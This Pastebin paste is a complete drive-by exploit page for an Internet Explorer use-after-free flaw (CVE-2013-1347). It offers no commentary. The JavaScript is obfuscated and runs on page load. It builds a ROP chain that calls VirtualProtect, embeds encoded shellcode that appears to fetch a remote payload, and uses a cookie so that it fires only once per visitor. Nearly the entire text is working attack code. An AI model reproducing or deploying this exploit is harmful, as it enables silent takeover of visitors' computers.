SHARE
TWEET

MSIE Use After Free EXP/CVE-2013-1347

a guest Jul 10th, 2013 1,147 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.     <!doctype html>
  2.     <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
  3.     <head>
  4.     <meta>
  5.       <?IMPORT namespace="t" implementation="#default#time2">
  6.     </meta>
  7.  
  8.     <script>
  9.     pRESSURA = eval('unescape');
  10.     fAHPARIC = CollectGarbage;
  11.     dISCESA = '%u';
  12.     function rIGUARDI(rEPLACEMENT) {
  13.         return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4));
  14.     }
  15.  
  16.     function vILMENTE(tRIPARTITO) {
  17.         rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10));
  18.         if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI;
  19.         mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10));
  20.         if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI;
  21.         tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10));
  22.         if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE;
  23.         pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10));
  24.         if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO;
  25.         return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO;
  26.     }
  27.     function ue(dw) {
  28.         return rIGUARDI(vILMENTE(dw));
  29.     }
  30.  
  31.     function setc() {
  32.         var Then = new Date()
  33.         Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3)
  34.         document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString()
  35.     }
  36.  
  37.     function readc() {
  38.         var cookieString = new String(document.cookie);
  39.  
  40.         if (cookieString.indexOf("fucktheothers") == -1) {
  41.               return 0
  42.         } else {
  43.               return 1;
  44.         }
  45.     }  
  46.  
  47.     function DropPayload()
  48.     {
  49.           // en = 77c10000
  50.           // kr = 77bc0000
  51.           // offset = 50000
  52.           var r = "";
  53.           r+= ue( 0x77bd4cfa );  // # POP EBP # RETN [msvcrt.dll]
  54.           r+= ue( 0x77bd4cfa );  // # skip 4 bytes [msvcrt.dll]
  55.           r += ue( 0x77BFFA1C);  // # POP EBX # RETN [msvcrt.dll]
  56.           r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201)
  57.           for(i=0;i<=0x201;i++) {
  58.           r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll]
  59.           }
  60.           r+= ue( 0x77be4de1 );  // # POP EAX # RETN [msvcrt.dll]
  61.           r+= ue( 0x2cfe04a7 );  // # put delta into eax (-> put += 0x00000040 into edx)
  62.           r+= ue( 0x77bfeb80 );  // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
  63.           r+= ue( 0x77c08fbc );  // # XCHG EAX,EDX # RETN [msvcrt.dll]
  64.           r+= ue( 0x77bde33f );  // # POP ECX # RETN [msvcrt.dll]
  65.           r+= ue( 0x77c0e062 );  // # &Writable location [msvcrt.dll]
  66.           r+= ue( 0x77bf6116 );  // # POP EDI # RETN [msvcrt.dll]
  67.           r+= ue( 0x77bf7a42 );  // # RETN (ROP NOP) [msvcrt.dll]
  68.           r+= ue( 0x77beb8ba );  // # POP ESI # RETN [msvcrt.dll]
  69.           r+= ue( 0x77bdaacc );  // # JMP [EAX] [msvcrt.dll]
  70.           r+= ue( 0x77beb860 );  // # POP EAX # RETN [msvcrt.dll]
  71.           r+= ue( 0x77bc1120 );  // # ptr to &VirtualProtect() [IAT msvcrt.dll]
  72.           r+= ue( 0x77d03ad9);   // # PUSHAD # RETN [user32.dll]
  73.           r+= ue( 0x77c01025 );  // # ptr to 'push esp # ret ' [msvcrt.dll]
  74.  
  75.           return r;
  76.     }
  77.     function align_esp()
  78.     {
  79.       var r= "";
  80.       r += ue(0x77BFD801);
  81.       return r;
  82.     }
  83.     function xchg_esp()
  84.     {
  85.       var r="";
  86.       r += ue(0x77BC5ED5);
  87.       return r;
  88.     }
  89.     function helloWorld()
  90.     {
  91.       if (readc()) return;
  92.       setc();
  93.  
  94.       unicorn = unescape("ABCD");
  95.       unicorn2 = unescape("EEEE");
  96.       for (i=0; i < 2; i++) {
  97.         unicorn += unescape("ABCD");
  98.       }unicorn += unescape("AB");
  99.  
  100.       unicorn += DropPayload();
  101.       unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919";
  102.       animvalues = align_esp();
  103.  
  104.       for (i=0; i < 0x70/4; i++) {
  105.         if (i == 0x70/4-1) {
  106.           animvalues += xchg_esp();
  107.         }
  108.         else {
  109.           animvalues += align_esp();
  110.         }
  111.       }
  112.  
  113.       animvalues += unicorn;
  114.  
  115.       for(i = 0; i < 13; i++) {
  116.         animvalues += ";red";
  117.       }
  118.       f0 = document.createElement('span');
  119.       document.body.appendChild(f0);
  120.       f1 = document.createElement('span');
  121.       document.body.appendChild(f1);
  122.       f2 = document.createElement('span');
  123.       document.body.appendChild(f2);
  124.       document.body.contentEditable="true";
  125.       f2.appendChild(document.createElement('datalist'));
  126.       f1.appendChild(document.createElement('span'));
  127.       f1.appendChild(document.createElement('table'));
  128.       try{
  129.         f0.offsetParent=null;
  130.       }catch(e) {
  131.  
  132.       }f2.innerHTML="";
  133.       f0.appendChild(document.createElement('hr'));
  134.       f1.innerHTML="";
  135.  
  136.       fAHPARIC();
  137.  
  138.       try {
  139.         a = document.getElementById('myanim');
  140.         a.values = animvalues;
  141.       }
  142.       catch(e) {}
  143.     }
  144.    
  145.     </script>
  146.     </head>
  147.     <body onload="eval(helloWorld());">
  148.     <t:ANIMATECOLOR id="myanim"/>
  149.  
  150.     </body>
  151.     </html>
  152.  
  153. @PhysicalDrive0
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top